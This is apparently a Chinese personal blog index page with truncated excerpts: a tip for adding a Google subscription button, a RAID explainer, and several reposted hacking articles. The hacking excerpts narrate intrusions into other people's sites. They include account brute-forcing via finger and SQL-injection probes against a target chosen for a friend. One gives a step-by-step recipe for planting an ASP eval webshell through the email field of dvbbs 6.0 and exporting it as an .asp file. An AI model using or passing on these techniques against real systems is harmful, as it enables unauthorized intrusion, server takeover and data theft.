鬼仔's Blog

随着Google推出多语言版本的Google个性化新闻页面以及Google Reader的改进，使用Google来阅读RSS的人也在逐步增加。如果要想在你的Blog上添加上订阅到Google的快捷按键，可以直接到这个页面提交你的Feed，再将生成的html代码拷贝到你的Blog模板上，就可以让读者方便地订阅你的Blog了。

比如，我的Blog的订阅到Google快捷按键的代码：
阅读全文 »

RAID源于服务器存储技术，翻译成中文就是独立磁盘冗余阵列，我们简称为磁盘阵列。它是一种可以把多块独立的硬盘按不同方式组合起来形成一个硬盘组，从而提供比单个硬盘更高的存储性能和冗余性能的技术。

对我们个人电脑用户比较有用的一些概念:

RAID 0：RAID 0在RAID级别里是读取速度和存储性能最高的一种。RAID0可以把连续的数据分散到多个硬盘上存取，这样，系统可以同时读取多块硬盘上的数据，这种并行操作可以快速提高磁盘读取和存储性能。

十块砖头放在十个房间，10个人分头行动，一人一块搬到大门口总比一个人一间一间来回跑着搬快的多。

阅读全文 »

来自：华夏Blog

Once upon a time，我发现了一个网站，于是常规入侵。很好，它的FINGER开着，于是我编了一个SHELL，从aaa帐号试到zzz（bye the way，这是我发现的一个网上规律，那就是帐号的长度与口令的强度成正比，如果一个帐号只有两三位长，那它的口令一般也很简单，反之亦然，故且称之为若氏定理吧），结果一个帐号也不存在，我没有再试它的帐号。因为我被它开的端口吸引住了，它开着WWW，我就不信它不出错。一连拿了五种CGI和WWW扫描器总计扫了三四百种常见错误它几乎都不存在，我KAO，I服了YOU！也有几个错误，我不知道如何利用，算了。又绕着主机转了几圈，象狐狸遇见刺猬，无从下嘴。

还是看看root的信息吧：finger root@xxx.xxx.xxx
Login name: root In real life: system PRIVILEGED account
阅读全文 »

文章作者：HaK_BaN[BCT]（www.cnbct.org）
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

备注：本文已经刊登在9月《黑客手册》中，转载时请标明出处以及文章完整性，本文首发漏洞中心小组，后作者友情提交到邪恶八进制。

在开始读该篇文章的时候,请大家首先了解一下关于本文所提及到相关知识以及原理.
(跨站脚本攻击的详细解释)
跨站脚本攻击又名CSS/XSS,就是利用ASP等等的文件设置和编写时的错误或者疏忽不当，攻击者就可以利用这些来达到自己攻击目的，如果一个服务器存在这些漏洞，那么它的沦陷也是时间的问题！
这些文本文件一般都是要结合数据库来使用的，这些数据库有ACCESS、MSSQL、MYSQL、Oracle等！脚本攻击就是针对这些数据库来配合脚本对一些变量的过滤不严的问题来达到得到用户密码等敏感信息，修改数据库等目的！
在现在的形式来说,CS 阅读全文 »

来自：Bluelight的小窝

for dvbbs 6.0
进入后台后 ,先到用户管理 ,随便改个人的邮件地址为,<%eval request(chr(35))%>@163.com
保存后,找到邮件列表导出,然后导出邮件列表到文本 把文件名的名字改为.asp,点导出，就得到了一个shell

文章作者：Andyower 天使娃娃
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注：本文已发表2005年9月的黑客防线.如有转载,请注名

近日,朋友说要我帮他弄一个站点,说那个站点有许多他想要的资料,他给出了站点www.***d.com,由于一些原因，所以本文有很多的截图都不能提供,希望大家可以谅解.

第一次渗透
先从主站入手,登陆上去看看,主站上面几乎都是静态的,只有一些新闻,而那些新闻是的注入点是连接到另外的一个IP,220.194.*.*/news.asp?id=111,试一下提交and 1=1,and 1=2,还有"news.asp?id=1'11","news.asp?id=11;1","news.asp?id=11 1","news.asp?id=11--1",全部返回正常,也就是说"'",";","--"," 阅读全文 »